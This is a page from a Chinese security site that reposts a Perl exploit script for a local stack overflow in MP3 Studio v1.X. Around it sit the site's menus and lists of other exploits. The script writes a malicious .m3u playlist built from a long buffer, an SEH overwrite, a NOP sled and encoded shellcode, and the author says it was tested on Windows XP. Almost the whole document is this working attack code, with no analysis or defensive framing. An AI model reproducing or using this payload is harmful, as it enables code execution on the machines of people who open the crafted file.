首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
MP3 Studio v1.X (.m3u File) Local Stack Overflow (Universal)
来源:vfocus.net 作者:D3V!L 发布时间:2010-01-21  

#!/usr/bin/perl 

# Exploit Title: MP3 Studio v1.X (.m3u File) Local Stack Overflow  Universal

# Date: 01/20/2010 

# Author: D3V!L FUCKER 

# Software Link: http://www.freewarezoom.com/archives/millennium-mp3-studio 

# Version: 1.X 

# Tested on: Windows XP SP2 , SP3


# Greetz [2] : THE INJECTIOR , sarbot511 , Thrid Devil , germaya_x , his0k4

# www.v99x.com <<< W3 M!ss y0u :(
  

$buff = "http://"."\x41" x 4103;
$SEH = "\xeb\x1b\x90\x90";
$NEX_SEH = "\x5B\x06\x02\x10";  
$nob = "\x90" x 22;
$sc = 
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". 
"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x47". 
"\x58\x30\x42\x31\x50\x42\x41\x6b\x42\x41\x57\x42\x32\x42\x41\x32". 
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x78\x69\x6b\x4c\x6a". 
"\x48\x53\x74\x67\x70\x67\x70\x75\x50\x4e\x6b\x53\x75\x65\x6c\x6e". 
"\x6b\x51\x6c\x46\x65\x70\x78\x43\x31\x68\x6f\x4e\x6b\x30\x4f\x54". 
"\x58\x6e\x6b\x73\x6f\x57\x50\x67\x71\x58\x6b\x77\x39\x4c\x4b\x64". 
"\x74\x6c\x4b\x57\x71\x5a\x4e\x76\x51\x49\x50\x6e\x79\x6e\x4c\x4f". 
"\x74\x4b\x70\x70\x74\x37\x77\x69\x51\x48\x4a\x64\x4d\x43\x31\x4f". 
"\x32\x7a\x4b\x48\x74\x55\x6b\x72\x74\x34\x64\x77\x74\x70\x75\x4d". 
"\x35\x6c\x4b\x71\x4f\x75\x74\x36\x61\x48\x6b\x41\x76\x4c\x4b\x44". 
"\x4c\x70\x4b\x4e\x6b\x63\x6f\x55\x4c\x33\x31\x68\x6b\x4e\x6b\x35". 
"\x4c\x4e\x6b\x34\x41\x6a\x4b\x6c\x49\x33\x6c\x35\x74\x64\x44\x4a". 
"\x63\x34\x71\x4b\x70\x63\x54\x6e\x6b\x71\x50\x76\x50\x4f\x75\x4b". 
"\x70\x72\x58\x74\x4c\x4c\x4b\x77\x30\x76\x6c\x4c\x4b\x44\x30\x57". 
"\x6c\x6c\x6d\x6e\x6b\x75\x38\x54\x48\x58\x6b\x73\x39\x6e\x6b\x4b". 
"\x30\x4e\x50\x37\x70\x67\x70\x37\x70\x6c\x4b\x62\x48\x45\x6c\x63". 
"\x6f\x35\x61\x39\x66\x35\x30\x50\x56\x4d\x59\x48\x78\x6e\x63\x59". 
"\x50\x43\x4b\x66\x30\x43\x58\x68\x70\x6f\x7a\x43\x34\x33\x6f\x73". 
"\x58\x4f\x68\x6b\x4e\x6d\x5a\x46\x6e\x72\x77\x6b\x4f\x78\x67\x63". 
"\x53\x62\x41\x30\x6c\x55\x33\x64\x6e\x42\x45\x70\x78\x32\x45\x33". 
"\x30\x47"; 
open(myfile,'>>4bdull4h.m3u'); 
print myfile $buff.$SEH.$NEX_SEH.$nob.$sc; 
close(myfile);

 


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·AOL 9.5 ActiveX 0day Exploit (
·Win32 Shellcode XP SP2 FR (cal
·Pidgin MSN <= 2.6.4 File Downl
·Windows NT User Mode to Ring 0
·RM Downloader .m3u BOF (SEH)
·Mini-stream Ripper 3.0.1.1 (.s
·Foxit Reader v3.1.4.1125 Activ
·Microsoft Windows Defender Act
·Millenium MP3 Studio v1.X (.m3
·jetAudio 8.0.0.2 Basic (m3u) S
·AOL 9.5 ActiveX Heap Overflow
·jetAudio 8.0.0.2 Basic Local C
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved